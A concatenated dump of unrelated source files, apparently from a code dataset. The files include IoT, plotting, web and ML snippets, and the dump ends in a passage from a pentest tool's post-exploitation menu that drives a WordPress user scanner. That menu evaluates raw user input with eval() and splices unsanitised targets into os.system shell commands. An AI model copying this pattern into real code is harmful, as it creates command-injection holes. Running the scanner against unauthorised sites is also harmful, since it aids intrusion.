# Set up OAuth against Telldus Live API
telldus_oauth1_session = os.environ.get('TELLDUS_OAUTH1_SESSION')
telldus_client_secret = os.environ.get('TELLDUS_CLIENT_SECRET')
telldus_resource_owner_key = os.environ.get('TELLDUS_RESOURCE_OWNER_KEY')
telldus_resource_owner_secret = os.environ.get('TELLDUS_RESOURCE_OWNER_SECRET')
telldus_user = OAuth1Session(telldus_oauth1_session,
client_secret=telldus_client_secret,
resource_owner_key=telldus_resource_owner_key,
resource_owner_secret=telldus_resource_owner_secret)
# Base URL for the API
base_url = "https://api.telldus.com/json"
'''
SensorObject with default data in case of empty or invalid response.
Note that all last_updated-style values are Unix timestamps and might
need some adjustment to display correct values.
'''
class SensorObject():
sensor_id: str
client_name: str
name: str
last_updated: datetime
ignored: bool
editable: bool
temp_value: float
temp_last_updated: datetime
temp_max_value: float
temp_max_time: datetime
temp_min_value: float
temp_min_time: datetime
humidity_value: float
humidity_last_updated: datetime
humidity_max_value: float
humidity_max_time: datetime
humidity_min_value: float
humidity_min_time: datetime
timezone_offset: int
'''
Function for collecting a list of sensors connected to your Telldus account and fetching the latest available information from them.
This function returns a list of SensorObjects to the user.
'''
# TODO: Add error handling and clean up code
def fetch_sensor_list(return_raw=False, return_list=False):
telldus_url = f'{base_url}/sensors/list'
telldus_call = telldus_user.get(telldus_url)
result = json.loads(telldus_call.text)
sensor_list = []
if (return_list):
for res in result['sensor']:
sensor_list.append({
'sensor_id': res['id'],
'sensor_name': res['name'],
'sensor_lastupdate': res['lastUpdated'],
'sensor_model': res['model']
})
else:
for res in result['sensor']:
if (return_raw):
sensor_list.append(fetch_sensor_data(res['id'], True))
else:
sensor_list.append(fetch_sensor_data(res['id']))
return sensor_list
'''
Function for collecting the latest available information from a specified Telldus sensor ID.
Returns a SensorObject containing the information to the user
'''
# TODO: Add error handling and clean up code
def fetch_sensor_data(sensor_id, return_raw=False):
telldus_url = f'{base_url}/sensor/info?id={sensor_id}'
telldus_call = telldus_user.get(telldus_url)
json_data = json.loads(telldus_call.text)
if json_data:
result = SensorObject()
result.sensor_id = json_data['id']
result.name = json_data['name']
result.client_name = json_data['clientName']
result.last_updated = json_data['lastUpdated'] if return_raw else datetime.fromtimestamp(
int(json_data['lastUpdated']))
try:
if json_data['data'][0]['name'] == 'temp':
# Handle temperature values
result.temp_value = float(json_data['data'][0]['value'])
result.temp_max_value = float(json_data['data'][0]['max'])
result.temp_min_value = float(json_data['data'][0]['min'])
# Handle datetime values
if (return_raw):
result.temp_last_updated = json_data['data'][0]['lastUpdated']
result.temp_max_time = json_data['data'][0]['maxTime']
result.temp_min_time = json_data['data'][0]['minTime']
else:
result.temp_last_updated = datetime.fromtimestamp(
int(json_data['data'][0]['lastUpdated']))
result.temp_max_time = datetime.fromtimestamp(
int(json_data['data'][0]['maxTime']))
result.temp_min_time = datetime.fromtimestamp(
int(json_data['data'][0]['minTime']))
except Exception:
pass
try:
if json_data['data'][1]['name'] == 'humidity':
# Handle humidity values
result.humidity_value = int(json_data['data'][1]['value'])
result.humidity_max_value = int(json_data['data'][1]['max'])
result.humidity_min_value = int(json_data['data'][1]['min'])
# Handle datetime values
if (return_raw):
result.humidity_last_updated = json_data['data'][1]['lastUpdated']
result.humidity_max_time = json_data['data'][1]['maxTime']
result.humidity_min_time = json_data['data'][1]['minTime']
else:
result.humidity_last_updated = datetime.fromtimestamp(
int(json_data['data'][1]['lastUpdated']))
result.humidity_max_time = datetime.fromtimestamp(
int(json_data['data'][1]['maxTime']))
result.humidity_min_time = datetime.fromtimestamp(
int(json_data['data'][1]['minTime']))
except Exception:
pass
result.timezone_offset = json_data['timezoneoffset']
else:
result = SensorObject()
return result
"""
A function for fetching sensor history stored at Telldus
"""
def fetch_sensor_history(sensor_id):
try:
telldus_url = f'{base_url}/sensor/history?id={sensor_id}'
telldus_call = telldus_user.get(telldus_url)
return json.loads(telldus_call.text)
except Exception:
return {'error': 'Error while fetching data.'}
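# Example usage (sketch; assumes the TELLDUS_* environment variables above are set
# to valid credentials for your account):
if __name__ == "__main__":
    for sensor in fetch_sensor_list(return_list=True):
        print(sensor['sensor_id'], sensor['sensor_name'], sensor['sensor_model'])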
| StarcoderdataPython |
1619027 | <gh_stars>0
# Comparison of attribute management techniques
"""
Note: inside __getattribute__ and __setattr__, avoid recursive loops by delegating to object or __dict__, e.g.:
def __getattribute__(self, name):
x = object.__getattribute__(self, 'other')
def __setattr__(self, name, value):
self.__dict__['other'] = value
def __setattr__(self, name, value):
object.__setattr__(self, 'other', value)
"""
# Implementation using property
class Powers:
def __init__(self, square, cube):
self._square = square
self._cube = cube
def getSquare(self):
return self._square ** 2
def setSquare(self, value):
self._square = value
square = property(getSquare, setSquare)
def getCube(self):
return self._cube ** 3
cube = property(getCube)
X = Powers(3, 4)
print(X.square)
print(X.cube)
X.square = 5
print(X.square)
print("*" * 40)
# Descriptor implementation: the descriptors store the underlying values as instance state, so those attributes must again start with an underscore to avoid clashing with the descriptor names
class DescSquare:
def __get__(self, instance, owner):
return instance._square ** 2
def __set__(self, instance, value):
instance._square = value
class DescCube:
def __get__(self, instance, owner):
return instance._cube ** 3
class Powers1:
square = DescSquare()
cube = DescCube()
def __init__(self, square, cube):
self._square = square
self._cube = cube
X = Powers1(3, 4)
print(X.square)
print(X.cube)
X.square = 5
print(X.square)
print("*" * 40)
# Using __getattr__ and __setattr__
class Powers2:
def __init__(self, square, cube):
self._square = square
self._cube = cube
def __getattr__(self, name):
if name == "square":
return self._square ** 2
elif name == "cube":
return self._cube ** 3
else:
raise TypeError
# Access to the managed names is undefined on the instance, so it falls through to __getattr__ above. We also need to write a __setattr__ to intercept assignments, taking care to avoid a potential recursion loop:
def __setattr__(self, name, value):
if name == "square":
self.__dict__["_square"] = value
else:
self.__dict__[name] = value
X = Powers2(3, 4)
print(X.square)
print(X.cube)
X.square = 5
print(X.square)
print("*" * 40)
class Powers3:
def __init__(self, square, cube):
self._square = square
self._cube = cube
def __getattribute__(self, name):
if name == "square":
return object.__getattribute__(self, "_square") ** 2
elif name == "cube":
return object.__getattribute__(self, "_cube") ** 3
else:
return object.__getattribute__(self, name)
def __setattr__(self, name, value):
if name == "square":
self.__dict__["_square"] = value
else:
self.__dict__[name] = value
X = Powers3(3, 4)
print(X.square)
print(X.cube)
X.square = 5
print(X.square)
| StarcoderdataPython |
196397 | """Predict with the most-common-label algorithm."""
import argparse
import logging
from pathlib import Path
import muspy
import numpy as np
import tqdm
from arranger.utils import (
load_config,
reconstruct_tracks,
save_sample_flat,
setup_loggers,
)
# Load configuration
CONFIG = load_config()
def parse_arguments():
"""Parse command-line arguments."""
parser = argparse.ArgumentParser()
parser.add_argument(
"-i",
"--input",
type=Path,
required=True,
help="input filename or directory",
)
parser.add_argument(
"-o", "--output_dir", type=Path, required=True, help="output directory"
)
parser.add_argument(
"-m",
"--model_filename",
type=Path,
required=True,
help="model filename",
)
parser.add_argument(
"-d",
"--dataset",
required=True,
choices=("bach", "musicnet", "nes", "lmd"),
help="dataset key",
)
parser.add_argument(
"-a",
"--audio",
action="store_true",
help="whether to write audio",
)
parser.add_argument(
"-s",
"--suffix",
default="pred",
help="suffix to the output filename(s)",
)
parser.add_argument(
"-q", "--quiet", action="store_true", help="reduce output verbosity"
)
return parser.parse_args()
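# Example invocation (illustrative; the script and file names are placeholders):
#   python predict_most_common.py -i data/test -o results -m most_common_label.txt -d bach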
def predict(music, model_filename):
"""Predict on a music."""
# Collect notes, labels and note counts
notes = []
for track in music.tracks:
# Skip drum track or empty track
if track.is_drum or not track.notes:
continue
# Collect notes and labels
for note in track.notes:
notes.append((note.time, note.pitch, note.duration, note.velocity))
# Sort the notes
notes.sort()
# Convert lists to arrays for speed reason
notes = np.array(notes, int)
# Load the learnt most common label
most_common_label = np.loadtxt(model_filename)
# Predict the labels by assigning the learnt most common label to every note
predictions = np.full(len(notes), most_common_label)
return notes, predictions
def process(filename, args):
"""Process a file."""
# Load the data
music = muspy.load(filename)
# Get note and predicted labels
notes, predictions = predict(music, args.model_filename)
# Shorthands
programs = CONFIG[args.dataset]["programs"]
colors = CONFIG["colors"]
# Reconstruct and save the music using the predicted labels
music_pred = music.deepcopy()
music_pred.tracks = reconstruct_tracks(notes, predictions, programs)
save_sample_flat(
music_pred, args.output_dir, f"{filename.stem}_{args.suffix}", colors
)
if args.audio:
muspy.write_audio(
args.output_dir / f"{filename.stem}_{args.suffix}.wav", music_pred
)
# Save the samples with drums
if CONFIG[args.dataset]["has_drums"]:
music_pred.tracks.append(music.tracks[-1]) # append drum track
save_sample_flat(
music_pred,
args.output_dir,
f"{filename.stem}_{args.suffix}_drums",
colors,
)
if args.audio:
muspy.write_audio(
args.output_dir / f"{filename.stem}_{args.suffix}_drums.wav",
music_pred,
)
return notes, predictions
def main():
"""Main function."""
# Parse command-line arguments
args = parse_arguments()
# Check output directory
if args.output_dir is not None and not args.output_dir.is_dir():
raise NotADirectoryError("`output_dir` must be an existing directory.")
# Set up loggers
setup_loggers(
filename=args.output_dir / Path(__file__).with_suffix(".log").name,
quiet=args.quiet,
)
# Log command-line arguments
logging.debug("Running with command-line arguments :")
for arg, value in vars(args).items():
logging.debug(f"- {arg} : {value}")
# Process the file
if args.input.is_file():
process(args.input, args)
return
# Collect filenames
logging.info("Collecting filenames...")
filenames = list(args.input.glob("*.json"))
assert filenames, "No input files found. Only JSON files are supported."
# Start inference
logging.info("Start testing...")
for filename in tqdm.tqdm(filenames, disable=args.quiet, ncols=80):
process(filename, args)
if __name__ == "__main__":
main()
| StarcoderdataPython |
1659108 | #!/usr/bin/env python
"""Reliable executor for intermittently failing functions"""
import functools
import time
def reliably_execute(
partial_function: functools.partial,
*,
retry: int=3,
wait: int=5,
):
"""Helper function to reliably execute the provided partial function"""
remaining_tries: int = retry + 1
while remaining_tries > 0:
remaining_tries -= 1
try:
return partial_function()
# We catch Exception here because we don't know what kind it could be
except Exception as exception:
if remaining_tries:
time.sleep(wait)
continue
raise RuntimeError(
f'Could not reliably execute "{partial_function}" because of "{exception}"',
)
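# Example usage (illustrative only): retry a flaky callable a few times.
if __name__ == "__main__":
    import random

    def _sometimes_fails() -> str:
        if random.random() < 0.5:
            raise RuntimeError("transient failure")
        return "ok"

    print(reliably_execute(functools.partial(_sometimes_fails), retry=3, wait=1))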
| StarcoderdataPython |
1667305 | <filename>script/maeplot/utils.py<gh_stars>1-10
import os
import errno
import math
def msecToMin(msec):
return float(msec) / 60000.0
def usecToMin(usec):
return msecToMin(usec / 1000)
def coverageToPercent(cov):
return cov * 100
def sameFloat(a, b, eps):
return abs(a - b) <= eps;
def mkdirRec(directory):
try:
os.makedirs(directory)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(directory):
pass
def getImmediateSubdirectories(p_dir):
return [name for name in os.listdir(p_dir)
if os.path.isdir(os.path.join(p_dir, name))]
def getSubdirectoriesConcat(p_dir):
subDirs = getImmediateSubdirectories(p_dir)
for i in range(0, len(subDirs)):
subDirs[i] = os.path.join(p_dir, subDirs[i])
return subDirs
def printHelp():
print "Usage: python plot.py <data directory>"
def calcStandardDeviation(data, meanValue):
if len(data) == 0:
return 0.0
diffSum = 0.0
count = float(len(data))
for value in data:
diffVal = float(value - meanValue)
diffSum = diffSum + (diffVal * diffVal)
return math.sqrt(diffSum / count)
def calcMean(dataSum, dataCount):
result = 0.0
if dataCount > 0:
result = float(dataSum) / float(dataCount)
return result
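# Worked example (illustrative): calcMean(10, 4) == 2.5, and
# calcStandardDeviation([1, 3, 3, 5], 3.0) == sqrt((4 + 0 + 0 + 4) / 4) == sqrt(2)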
| StarcoderdataPython |
1749934 | <reponame>variable/todobackend
from django.contrib import admin
from .models import TODOItem
class TODOItemAdmin(admin.ModelAdmin):
list_display = ['uuid', 'session_id', 'description', 'priority', 'created_at', 'completed_at']
admin.site.register(TODOItem, TODOItemAdmin)
| StarcoderdataPython |
69531 | <reponame>stakira/ENUNU
#!/usr/bin/env python3
# Copyright (c) 2022 oatsu
"""
Run timelag and duration prediction together.
Because an MDN-style duration model produces a probability distribution, the result is awkward to write out as a full label.
Therefore timelag and duration are not written to files; everything is run through to timing in one go.
"""
import hydra
import joblib
import numpy as np
import torch
from hydra.utils import to_absolute_path
from nnmnkwii.io import hts
from nnsvs.gen import postprocess_duration, predict_duration, predict_timelag
from nnsvs.logger import getLogger
from omegaconf import DictConfig, OmegaConf
from enulib.common import set_checkpoint, set_normalization_stat
logger = None
def _score2timelag(config: DictConfig, labels):
"""
Run the whole timelag prediction.
"""
# -----------------------------------------------------
# From here: contents of nnsvs.bin.synthesis.my_app() --------
# -----------------------------------------------------
# Logger setup
global logger # pylint: disable=global-statement
logger = getLogger(config.verbose)
logger.info(OmegaConf.to_yaml(config))
typ = 'timelag'
# Check whether CUDA is available
device = 'cuda' if torch.cuda.is_available() else 'cpu'
# Equivalent of maybe_set_checkpoints_(config)
set_checkpoint(config, typ)
# Equivalent of maybe_set_normalization_stats_(config)
set_normalization_stat(config, typ)
# Load the various model settings
model_config = OmegaConf.load(to_absolute_path(config[typ].model_yaml))
model = hydra.utils.instantiate(model_config.netG).to(device)
checkpoint = torch.load(config[typ].checkpoint,
map_location=lambda storage,
loc: storage)
model.load_state_dict(checkpoint['state_dict'])
in_scaler = joblib.load(config[typ].in_scaler_path)
out_scaler = joblib.load(config[typ].out_scaler_path)
model.eval()
# -----------------------------------------------------
# Up to here: contents of nnsvs.bin.synthesis.my_app() --------
# -----------------------------------------------------
# -----------------------------------------------------
# From here: contents of nnsvs.bin.synthesis.synthesis() -----
# -----------------------------------------------------
# Read the full_score label.
# labels = hts.load(score_path).round_()
# Read the hed file.
question_path = to_absolute_path(config.question_path)
# In hts2wav.py it is done like this: -----------------
# (that way a separate hed file can be applied per model)
# if config[typ].question_path is None:
# config[typ].question_path = config.question_path
# --------------------------------------
# Read the hed file as question dictionaries.
binary_dict, continuous_dict = \
hts.load_question_set(question_path, append_hat_for_LL=False)
# pitch indices in the input features
# pitch_idx = len(binary_dict) + 1
pitch_indices = np.arange(len(binary_dict), len(binary_dict)+3)
# Read the f0 settings.
log_f0_conditioning = config.log_f0_conditioning
# Apply the timelag model
# Time-lag
lag = predict_timelag(
device,
labels,
model,
model_config,
in_scaler,
out_scaler,
binary_dict,
continuous_dict,
pitch_indices,
log_f0_conditioning,
config.timelag.allowed_range,
config.timelag.allowed_range_rest
)
# -----------------------------------------------------
# Up to here: contents of nnsvs.bin.synthesis.synthesis() -----
# -----------------------------------------------------
# Output as a full label (left disabled here):
# save_timelag_label_file(lag, score_path, timelag_path)
return lag
def _score2duration(config: DictConfig, labels):
"""
Generate a duration label from the full_score and timelag labels.
"""
# -----------------------------------------------------
# From here: contents of nnsvs.bin.synthesis.my_app() --------
# -----------------------------------------------------
# Logger setup
global logger # pylint: disable=global-statement
logger = getLogger(config.verbose)
logger.info(OmegaConf.to_yaml(config))
typ = 'duration'
# Check whether CUDA is available
device = 'cuda' if torch.cuda.is_available() else 'cpu'
# Equivalent of maybe_set_checkpoints_(config)
set_checkpoint(config, typ)
# Equivalent of maybe_set_normalization_stats_(config)
set_normalization_stat(config, typ)
# Load the various model settings
model_config = OmegaConf.load(to_absolute_path(config[typ].model_yaml))
model = hydra.utils.instantiate(model_config.netG).to(device)
checkpoint = torch.load(config[typ].checkpoint,
map_location=lambda storage,
loc: storage)
model.load_state_dict(checkpoint['state_dict'])
in_scaler = joblib.load(config[typ].in_scaler_path)
out_scaler = joblib.load(config[typ].out_scaler_path)
model.eval()
# -----------------------------------------------------
# Up to here: contents of nnsvs.bin.synthesis.my_app() --------
# -----------------------------------------------------
# -----------------------------------------------------
# From here: contents of nnsvs.bin.synthesis.synthesis() -----
# -----------------------------------------------------
# Read the full_score label.
# labels = hts.load(score_path).round_()
# Not used by the current duration model:
# timelag = hts.load(timelag_path).round_()
# Read the hed file.
question_path = to_absolute_path(config.question_path)
# In hts2wav.py it is done like this: -----------------
# (that way a separate hed file can be applied per model)
# if config[typ].question_path is None:
# config[typ].question_path = config.question_path
# --------------------------------------
# Read the hed file as question dictionaries.
binary_dict, continuous_dict = \
hts.load_question_set(question_path, append_hat_for_LL=False)
# pitch indices in the input features
# pitch_idx = len(binary_dict) + 1
pitch_indices = np.arange(len(binary_dict), len(binary_dict)+3)
# Read the f0 settings.
log_f0_conditioning = config.log_f0_conditioning
# Apply the duration model
duration = predict_duration(
device,
labels,
model,
model_config,
in_scaler,
out_scaler,
binary_dict,
continuous_dict,
pitch_indices,
log_f0_conditioning,
force_clip_input_features=False
)
# Return the duration as a tuple or ndarray
return duration
def score2timing(config: DictConfig, path_score, path_timing):
"""
full_score から full_timing ラベルを生成する。
"""
# full_score を読む
score = hts.load(path_score).round_()
# timelag
timelag = _score2timelag(config, score)
# duration
duration = _score2duration(config, score)
# timing
timing = postprocess_duration(score, duration, timelag)
# Write out the timing file
with open(path_timing, 'w', encoding='utf-8') as f:
f.write(str(timing))
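# Example (sketch; paths are placeholders):
# score2timing(config, 'song/full_score.lab', 'song/full_timing.lab')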
| StarcoderdataPython |
114266 | <gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
def LF_flux(FL, FR, lmax, lmin, UR, UL, dt, dx):
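    """
    Global Lax-Friedrichs numerical flux: 0.5*(FL + FR) - 0.5*(dx/dt)*(UR - UL).
    Note that lmax and lmin (wave-speed bounds) are accepted but unused here,
    since the dissipation coefficient is taken as ctilde = dx/dt.
    """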
ctilde = dx / dt
return 0.5 * (FL + FR) - 0.5 * ctilde * (UR - UL)
| StarcoderdataPython |
44445 |
from thaniya_server_sudo import SudoScriptRunner
from thaniya_server.usermgr import BackupUserManager
from thaniya_server.sysusers import SystemAccountManager
class IUploadSlotContext:
@property
def backupUserManager(self) -> BackupUserManager:
raise NotImplementedError()
#
@property
def sudoScriptRunner(self) -> SudoScriptRunner:
raise NotImplementedError()
#
@property
def systemAccountManager(self) -> SystemAccountManager:
raise NotImplementedError()
#
#
| StarcoderdataPython |
3255827 | <reponame>kurli/chromium-crosswalk
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'variables': {
'chromium_code': 1,
},
'includes': [
'../native_client/build/untrusted.gypi',
'nacl/nacl_defines.gypi',
],
'target_defaults': {
'variables': {
'nacl_target': 0,
},
'target_conditions': [
# This part is shared between the targets defined below. Only files and
# settings relevant for building the Win64 target should be added here.
['nacl_target==1', {
'include_dirs': [
'<(INTERMEDIATE_DIR)',
],
'defines': [
'<@(nacl_defines)',
],
'sources': [
# .cc, .h, and .mm files under nacl that are used on all
# platforms, including both 32-bit and 64-bit Windows.
# Test files are also not included.
'nacl/loader/nacl_ipc_adapter.cc',
'nacl/loader/nacl_ipc_adapter.h',
'nacl/loader/nacl_main.cc',
'nacl/loader/nacl_main_platform_delegate.h',
'nacl/loader/nacl_main_platform_delegate_linux.cc',
'nacl/loader/nacl_main_platform_delegate_mac.mm',
'nacl/loader/nacl_main_platform_delegate_win.cc',
'nacl/loader/nacl_listener.cc',
'nacl/loader/nacl_listener.h',
'nacl/loader/nacl_validation_db.h',
'nacl/loader/nacl_validation_query.cc',
'nacl/loader/nacl_validation_query.h',
],
# TODO(gregoryd): consider switching NaCl to use Chrome OS defines
'conditions': [
['OS=="win"', {
'defines': [
'__STDC_LIMIT_MACROS=1',
],
'include_dirs': [
'<(DEPTH)/third_party/wtl/include',
],
},],
['OS=="linux"', {
'defines': [
'__STDC_LIMIT_MACROS=1',
],
'sources': [
'../components/nacl/common/nacl_paths.cc',
'../components/nacl/common/nacl_paths.h',
'../components/nacl/zygote/nacl_fork_delegate_linux.cc',
'../components/nacl/zygote/nacl_fork_delegate_linux.h',
],
},],
],
}],
],
},
'conditions': [
['disable_nacl!=1', {
'targets': [
{
'target_name': 'nacl',
'type': 'static_library',
'variables': {
'nacl_target': 1,
},
'dependencies': [
'../base/base.gyp:base',
'../ipc/ipc.gyp:ipc',
'../ppapi/native_client/src/trusted/plugin/plugin.gyp:ppGoogleNaClPluginChrome',
'../ppapi/ppapi_internal.gyp:ppapi_shared',
'../ppapi/ppapi_internal.gyp:ppapi_ipc',
'../native_client/src/trusted/service_runtime/service_runtime.gyp:sel_main_chrome',
],
'conditions': [
['disable_nacl_untrusted==0', {
'dependencies': [
'../ppapi/native_client/native_client.gyp:nacl_irt',
'../ppapi/native_client/src/untrusted/pnacl_irt_shim/pnacl_irt_shim.gyp:pnacl_irt_shim',
'../ppapi/native_client/src/untrusted/pnacl_support_extension/pnacl_support_extension.gyp:pnacl_support_extension',
],
}],
],
'direct_dependent_settings': {
'defines': [
'<@(nacl_defines)',
],
},
},
],
'conditions': [
['OS=="win" and target_arch=="ia32"', {
'targets': [
{
'target_name': 'nacl_win64',
'type': 'static_library',
'variables': {
'nacl_target': 1,
},
'dependencies': [
'../native_client/src/trusted/service_runtime/service_runtime.gyp:sel_main_chrome64',
'../ppapi/ppapi_internal.gyp:ppapi_shared_win64',
'../ppapi/ppapi_internal.gyp:ppapi_ipc_win64',
'../components/nacl_common.gyp:nacl_common_win64',
],
'export_dependent_settings': [
'../ppapi/ppapi_internal.gyp:ppapi_ipc_win64',
],
'sources': [
'../components/nacl/broker/nacl_broker_listener.cc',
'../components/nacl/broker/nacl_broker_listener.h',
'../components/nacl/common/nacl_debug_exception_handler_win.cc',
],
'include_dirs': [
'..',
],
'defines': [
'<@(nacl_win64_defines)',
'COMPILE_CONTENT_STATICALLY',
],
'configurations': {
'Common_Base': {
'msvs_target_platform': 'x64',
},
},
'direct_dependent_settings': {
'defines': [
'<@(nacl_defines)',
],
},
},
],
}],
],
}, { # else (disable_nacl==1)
'targets': [
{
'target_name': 'nacl',
'type': 'none',
'sources': [],
},
],
'conditions': [
['OS=="win"', {
'targets': [
{
'target_name': 'nacl_win64',
'type': 'none',
'sources': [],
},
],
}],
],
}],
],
}
| StarcoderdataPython |
3386823 | """
Helper functions for missing functionality in cupy.
"""
try:
import cupy as xp
from cupyx.scipy.special import erf, gammaln
CUPY_LOADED = True
except ImportError:
import numpy as xp
from scipy.special import erf, gammaln
CUPY_LOADED = False
def betaln(alpha, beta):
r"""
Logarithm of the Beta function
.. math::
\ln B(\alpha, \beta) = \ln\Gamma(\alpha) + \ln\Gamma(\beta) - \ln\Gamma(\alpha + \beta)
Parameters
----------
alpha: float
The Beta alpha parameter (:math:`\alpha`)
beta: float
The Beta beta parameter (:math:`\beta`)
Returns
-------
ln_beta: float, array-like
The ln Beta function
"""
ln_beta = gammaln(alpha) + gammaln(beta) - gammaln(alpha + beta)
return ln_beta
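# Example (sanity check): betaln(1.0, 1.0) == 0.0, since B(1, 1) = 1.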
def to_numpy(array):
"""Cast any array to numpy"""
if not CUPY_LOADED:
return array
else:
return xp.asnumpy(array)
def trapz(y, x=None, dx=1.0, axis=-1):
"""
Lifted from `numpy <https://github.com/numpy/numpy/blob/v1.15.1/numpy/lib/function_base.py#L3804-L3891>`_.
Integrate along the given axis using the composite trapezoidal rule.
Integrate `y` (`x`) along given axis.
Parameters
==========
y : array_like
Input array to integrate.
x : array_like, optional
The sample points corresponding to the `y` values. If `x` is None,
the sample points are assumed to be evenly spaced `dx` apart. The
default is None.
dx : scalar, optional
The spacing between sample points when `x` is None. The default is 1.
axis : int, optional
The axis along which to integrate.
Returns
=======
trapz : float
Definite integral as approximated by trapezoidal rule.
References
==========
.. [1] Wikipedia page: http://en.wikipedia.org/wiki/Trapezoidal_rule
Examples
========
>>> trapz([1,2,3])
4.0
>>> trapz([1,2,3], x=[4,6,8])
8.0
>>> trapz([1,2,3], dx=2)
8.0
>>> a = xp.arange(6).reshape(2, 3)
>>> a
array([[0, 1, 2],
[3, 4, 5]])
>>> trapz(a, axis=0)
array([ 1.5, 2.5, 3.5])
>>> trapz(a, axis=1)
array([ 2., 8.])
"""
y = xp.asanyarray(y)
if x is None:
d = dx
else:
x = xp.asanyarray(x)
if x.ndim == 1:
d = xp.diff(x)
# reshape to correct shape
shape = [1] * y.ndim
shape[axis] = d.shape[0]
d = d.reshape(shape)
else:
d = xp.diff(x, axis=axis)
nd = y.ndim
slice1 = [slice(None)] * nd
slice2 = [slice(None)] * nd
slice1[axis] = slice(1, None)
slice2[axis] = slice(None, -1)
product = d * (y[tuple(slice1)] + y[tuple(slice2)]) / 2.0
try:
ret = product.sum(axis)
except ValueError:
ret = xp.add.reduce(product, axis)
return ret
| StarcoderdataPython |
189024 | """Controller holding and managing HUE resources of type `scene`."""
from typing import Optional, Type, Union
from ..models.feature import DimmingFeaturePut, RecallAction, RecallFeature
from ..models.resource import ResourceTypes
from ..models.room import Room
from ..models.scene import Scene, ScenePut
from ..models.zone import Zone
from .base import BaseResourcesController
class ScenesController(BaseResourcesController[Type[Scene]]):
"""Controller holding and managing HUE resources of type `scene`."""
item_type = ResourceTypes.SCENE
item_cls = Scene
allow_parser_error = True
async def recall(
self,
id: str,
dynamic: bool = False,
duration: Optional[int] = None,
brightness: Optional[float] = None,
) -> None:
"""Turn on / recall scene."""
action = RecallAction.DYNAMIC_PALETTE if dynamic else RecallAction.ACTIVE
update_obj = ScenePut(recall=RecallFeature(action=action, duration=duration))
if brightness is not None:
update_obj.recall.dimming = DimmingFeaturePut(brightness=brightness)
await self.update(id, update_obj)
def get_group(self, id: str) -> Union[Room, Zone]:
"""Get group attached to given scene id."""
scene = self[id]
return next((x for x in self._bridge.groups if x.id == scene.group.rid))
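# Example (sketch; assumes a connected bridge object exposing this controller as
# `bridge.scenes`, which is an assumption about the surrounding library):
#   await bridge.scenes.recall(scene_id, brightness=80.0)
#   group = bridge.scenes.get_group(scene_id)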
| StarcoderdataPython |
3306735 | import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import plotly.express as px
import pandas as pd
import requests
import json
from app import app
base_url = 'https://api.pro.coinbase.com/products/{}/candles?granularity=86400'
def getBTCData(currency):
sym = 'BTC' + '-' + currency
url = base_url.format(sym)
response = requests.get(url)
if response.status_code == 200:
data = pd.DataFrame(json.loads(response.text),
columns=['Time', 'Low', 'High', 'Open', 'Close', 'Volume'])
data['Date'] = pd.to_datetime(data['Time'], unit='s')
return data
else:
return None
layout = html.Div([
dcc.Link('Home', href='/home'),
html.H1('BTC-Fiat Price Charts'),
dcc.Dropdown(
id='fiat-dropdown-1',
options=[
{'label': i, 'value': i} for i in [
'USD', 'EUR', 'JPY', 'GBP', 'CHF'
]
]
),
html.Div(id='btc-fiat-chart'),
dcc.Link('View ETH Pricing', href='/eth')
])
@app.callback(
Output('btc-fiat-chart', 'children'),
Input('fiat-dropdown-1', 'value'))
def display_value(value):
if value is None:
return html.Div()
data = getBTCData(value)
if data is None:
return html.H3("No data found for BTC/{}".format(value))
fig = px.line(data, x='Date', y='Close')
return dcc.Graph(id='btc-fiat-chart-obj',
figure=fig) | StarcoderdataPython |
1634231 | #!/usr/bin/env python
"""
inspiration.
* https://github.com/eightBEC/fastapi-ml-skeleton/tree/master/fastapi_skeleton
(APACHE 2.0)
* https://github.com/leosussan/fastapi-gino-arq-uvicorn
(PUBLIC DOMAIN)
"""
from fastapi import FastAPI
from fast_microservice.helpers import MiddlewareWrapper
from fast_microservice.routers import error, heartbeat, versions
from fast_microservice.settings.globals import (
API_PREFIX,
APP_NAME,
APP_VERSION,
DEBUG,
SENTRY_DSN,
SENTRY_ENABLED,
)
ROUTERS = (heartbeat.router, versions.router, error.router)
def get_app() -> FastAPI:
""" Fastapi App instance. """
fast_app = FastAPI(title=APP_NAME, version=APP_VERSION, debug=DEBUG)
for router in ROUTERS:
fast_app.include_router(router, prefix=API_PREFIX)
if SENTRY_ENABLED and SENTRY_DSN not in ("None", ""):
import sentry_sdk
from sentry_sdk.integrations.asgi import SentryAsgiMiddleware
sentry_sdk.init(dsn=str(SENTRY_DSN))
fast_app = MiddlewareWrapper(SentryAsgiMiddleware(fast_app))
return fast_app
app = get_app()
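# Example (sketch; the module path is an assumption about the package layout):
#   uvicorn fast_microservice.main:app --reload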
| StarcoderdataPython |
75198 | <reponame>GDGSNF/PXXTF<filename>core/postex.py
#!/usr/bin/python
import os, sys, subprocess, bs4,signal,requests
import core
from urllib.parse import quote
from socket import timeout
from urllib.request import urlopen
from urllib.request import Request
import readline, rlcompleter
from sys import argv
from subprocess import *
from core import help
R = '\033[31m' # Red
N = '\033[1;37m' # White
G = '\033[32m' # Green
O = '\033[0;33m' # Orange
B = '\033[1;34m' #Blue
E = '\033[0m' # End
def clean():
os.system("clear")
def wordpress_scan():
while True:
sec = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/wordpress_user_scanners"+N+"): "))
if sec == 'show options':
help.option()
wordpress_scan()
elif sec =='back':
core.menu.post()
elif sec =='set target':
wop = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/wordpress_user_scanners "+G+"(target)"+N+"): "))
enum = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/wordpress_user_scanners "+G+"(user)"+N+"): "))
uiop = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/wordpress_user_scanners"+N+"): "))
if uiop == "run":
print((""+B+"[*]"+N+" Starting attacks..."))
os.system("cd modules;cd wscan;python wpscanner.py -s %s -n %s" % (wop,enum))
print((""+B+"[*]"+N+" Job finished!"))
print()
wordpress_scan()
else:
wordpress_scan()
elif sec == 'clear':
clean()
wordpress_scan()
elif sec =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
else:
print(("Wrong Command => ", sec))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
wordpress_scan()
pass
def dirse():
while True:
dir = eval(input("Pentest>> ("+B+"modules/post)("+R+"post/dir_search"+N+"): "))
if dir == 'show options':
help.option()
dirse()
